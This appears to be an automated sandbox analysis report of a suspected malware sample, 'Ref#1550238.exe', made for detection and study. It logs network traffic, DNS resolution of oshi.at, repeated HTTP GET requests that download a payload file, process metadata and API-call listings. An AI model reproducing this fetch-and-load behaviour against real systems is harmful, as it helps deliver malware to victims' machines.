                                                    Dec 3, 2024 15:12:10.650810003 CET443499945.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:10.650939941 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:10.652816057 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:10.652842045 CET443499945.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:10.653161049 CET443499945.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:10.654905081 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:10.699340105 CET443499945.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:13.530109882 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.530225039 CET443499945.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:13.530437946 CET443499945.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:13.530471087 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.530693054 CET49994443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.531796932 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.531856060 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:13.532289028 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.532562971 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:13.532577991 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.357887983 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.359235048 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:15.384819031 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:15.384851933 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.385248899 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:15.391361952 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:15.435343981 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:24.396898031 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.397008896 CET443499955.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:24.397058010 CET49995443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.398858070 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.398893118 CET443499965.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:24.398978949 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.399684906 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:24.399703979 CET443499965.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:26.264415979 CET443499965.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:26.264489889 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.434020996 CET49996443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.438958883 CET49997443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.439024925 CET443499975.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:26.439095974 CET49997443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.439376116 CET49997443192.168.2.75.253.86.15
                                                    Dec 3, 2024 15:12:26.439398050 CET443499975.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:28.259754896 CET443499975.253.86.15192.168.2.7
                                                    Dec 3, 2024 15:12:28.259826899 CET49997443192.168.2.75.253.86.15
Timestamp                         | Source Port | Dest Port | Source IP   | Dest IP
Dec 3, 2024 15:08:21.122968912 CET | 55272       | 53        | 192.168.2.7 | 1.1.1.1
Dec 3, 2024 15:08:21.444981098 CET | 53          | 55272     | 1.1.1.1     | 192.168.2.7

Timestamp                         | Source IP   | Dest IP | Trans ID | OP Code            | Name    | Type           | Class       | DNS over HTTPS
Dec 3, 2024 15:08:21.122968912 CET | 192.168.2.7 | 1.1.1.1 | 0xb2d5   | Standard query (0) | oshi.at | A (IP address) | IN (0x0001) | false

Timestamp                         | Source IP | Dest IP     | Trans ID | Reply Code   | Name    | CName | Address        | Type           | Class       | DNS over HTTPS
Dec 3, 2024 15:08:21.444981098 CET | 1.1.1.1   | 192.168.2.7 | 0xb2d5   | No error (0) | oshi.at |       | 5.253.86.15    | A (IP address) | IN (0x0001) | false
Dec 3, 2024 15:08:21.444981098 CET | 1.1.1.1   | 192.168.2.7 | 0xb2d5   | No error (0) | oshi.at |       | 194.15.112.248 | A (IP address) | IN (0x0001) | false

• oshi.at
Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
0          | 192.168.2.7 | 49708       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:08:23 UTC | 61                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at
                        |                   |           | Connection: Keep-Alive
2024-12-03 14:09:13 UTC | 316               | IN        | HTTP/1.1 200 OK
                        |                   |           | Server: nginx
                        |                   |           | Date: Tue, 03 Dec 2024 14:09:12 GMT
                        |                   |           | Content-Type: application/octet-stream
                        |                   |           | Content-Length: 997384
                        |                   |           | Connection: close
                        |                   |           | Last-Modified: Mon, 02 Dec 2024 21:59:34 GMT
                        |                   |           | Accept-Ranges: bytes
                        |                   |           | ETag: "862892d4964a747c945b938d4d1a2260"
                        |                   |           | Content-Disposition: attachment; filename=RFmZ.dat


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
1          | 192.168.2.7 | 49896       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:09:52 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
2          | 192.168.2.7 | 49927       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:10:05 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
3          | 192.168.2.7 | 49938       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:10:10 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
4          | 192.168.2.7 | 49965       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:10:22 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.7 | 49983       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:10:30 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.7 | 49985       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:10:50 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
7          | 192.168.2.7 | 49986       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:11:01 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
8          | 192.168.2.7 | 49989       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:11:17 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
9          | 192.168.2.7 | 49990       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:11:37 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
10         | 192.168.2.7 | 49993       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:11:55 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
11         | 192.168.2.7 | 49994       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
2024-12-03 14:12:10 UTC | 37                | OUT       | GET /EqqP HTTP/1.1
                        |                   |           | Host: oshi.at


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
12         | 192.168.2.7 | 49995       | 5.253.86.15    | 443              | 7480 | C:\Users\user\Desktop\Ref#1550238.exe

Timestamp               | Bytes transferred | Direction | Data
                                                    2024-12-03 14:12:15 UTC37OUTGET /EqqP HTTP/1.1
                                                    Host: oshi.at


Target ID: 0
Start time: 09:08:20
Start date: 03/12/2024
Path: C:\Users\user\Desktop\Ref#1550238.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Ref#1550238.exe"
Imagebase: 0xe20000
File size: 348'128 bytes
MD5 hash: A31BCF203BB60F13DE83211AC9D44D06
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false


                                                      Execution Graph

                                                      Execution Coverage:9.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:97
                                                      Total number of Limit Nodes:8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:

Control-flow Graph
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32 ref: 0164DADE
                                                      • GetCurrentThread.KERNEL32 ref: 0164DB1B
                                                      • GetCurrentProcess.KERNEL32 ref: 0164DB58
                                                      • GetCurrentThreadId.KERNEL32 ref: 0164DBB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: Current$ProcessThread
                                                      • String ID:
                                                      • API String ID: 2063062207-0

Control-flow Graph
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0164B61E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0

Control-flow Graph
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056F1F22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0

Control-flow Graph
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 056F1F22
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0

Control-flow Graph
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 056F4621
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0

Control-flow Graph
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0164DD2F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0

Control-flow Graph
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0164B61E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741168782.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_138d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741168782.000000000138D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0138D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_138d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 68bf4ab02c995436f037b855f08ee9e50c206b6986fe83d343353a22b88a1130
                                                      • Instruction ID: 608c0f5e9fa678efee43ee3d9b83a41baae6a4a9b2db824d4ef0db6146db73a5
                                                      • Opcode Fuzzy Hash: 68bf4ab02c995436f037b855f08ee9e50c206b6986fe83d343353a22b88a1130
                                                      • Instruction Fuzzy Hash: 2701F7310083949BE7206E59DCC4B66BFDCDF41229F04C01AED090A582C37C9840CAB2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741073400.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_132d000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 17c8fa69ea91380d6e08ff2ebc82eff73745a135503d38c93ba65af0114da183
                                                      • Instruction ID: 06ee30b50157ae643f42747b08934bd87f2417715198f79b9cdbbc7a2a507ab5
                                                      • Opcode Fuzzy Hash: 17c8fa69ea91380d6e08ff2ebc82eff73745a135503d38c93ba65af0114da183
                                                      • Instruction Fuzzy Hash: 64F06D71408394AEE7209E1AD884B62FF98EB41639F18C55AED484A287C379A844CAB1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cff75fbfbd02259b22bf4587a7f460ade4817dfc60632ff8c4b7d7a3a3685455
                                                      • Instruction ID: 078e51532d663525786c5e98f7b4958eae58b214e8c4c8a93cbf2189a554a28c
                                                      • Opcode Fuzzy Hash: cff75fbfbd02259b22bf4587a7f460ade4817dfc60632ff8c4b7d7a3a3685455
                                                      • Instruction Fuzzy Hash: BD1288B1403B458BD718EF69E84C1893BB6B74B329B504209D2611F2EDDBB815EACF74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3741548669.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1640000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 44aa1b0f762cd2d06b832b9c50b2e1f0220bf09613273653e18b2330ccc7db71
                                                      • Instruction ID: 5c2db9ded4a2e20b9ba4417ebd5b1814a918274f4e3eea89e56693d366f571a2
                                                      • Opcode Fuzzy Hash: 44aa1b0f762cd2d06b832b9c50b2e1f0220bf09613273653e18b2330ccc7db71
                                                      • Instruction Fuzzy Hash: C8A18132E012158FCF09DFB9C84459EBBB2FF85301B1585AAE906AB325DB31E956CF50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2ecfc4e1dd09d1a03c53c58410a6aba4c657b71d1f002a93c0eea29d7c308c08
                                                      • Instruction ID: 5ced8ba4bfdd3198a656235d33837f69bcfb027d231dbadc23833a44beaa6a2c
                                                      • Opcode Fuzzy Hash: 2ecfc4e1dd09d1a03c53c58410a6aba4c657b71d1f002a93c0eea29d7c308c08
                                                      • Instruction Fuzzy Hash: 65C1FCB1413B458BD718EF68E8481897BB6BB8B325F604309D1612B2DDDBB414EACF74
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a2a046293e8829dc34579cd2d71ba08f25f5343db32eede035b1f911bfc4c49b
                                                      • Instruction ID: 0215cd04171c1fbb648d3741c49d854f2a22528b348052b3faadf4f5382a00d1
                                                      • Opcode Fuzzy Hash: a2a046293e8829dc34579cd2d71ba08f25f5343db32eede035b1f911bfc4c49b
                                                      • Instruction Fuzzy Hash: 23910B34A18208CFE714CF58D088B99B7F3FB88314F19A265D505AB796DB74AC86CF60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 761f3391363c67ba6355ab5f0fcf00d786123146e601384d0bc35e2c7c1e5077
                                                      • Instruction ID: b951439dc4e64a880903d6d01b5a67e5a03707ee4db9a3b4fc0380c625595e1c
                                                      • Opcode Fuzzy Hash: 761f3391363c67ba6355ab5f0fcf00d786123146e601384d0bc35e2c7c1e5077
                                                      • Instruction Fuzzy Hash: 1C91ED34A18208CFE714CF58D088B99B7B3FB88354F15A265D505AB796DB74BC86CF60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3742802422.00000000056F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_56f0000_Ref#1550238.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 302ee65166eccb6f5340c034752e3a5f4e34df456de9b076273b8d9498d403d3
                                                      • Instruction ID: 2f5f4a4d87862b6789dafb81158a91ecb7d86d1377031766ffb2068c542eb482
                                                      • Opcode Fuzzy Hash: 302ee65166eccb6f5340c034752e3a5f4e34df456de9b076273b8d9498d403d3
                                                      • Instruction Fuzzy Hash: F1815A31F04204CFD714CFA9C484BBAB3B3FB84302F54C56AD61A9BA54E774A986CB61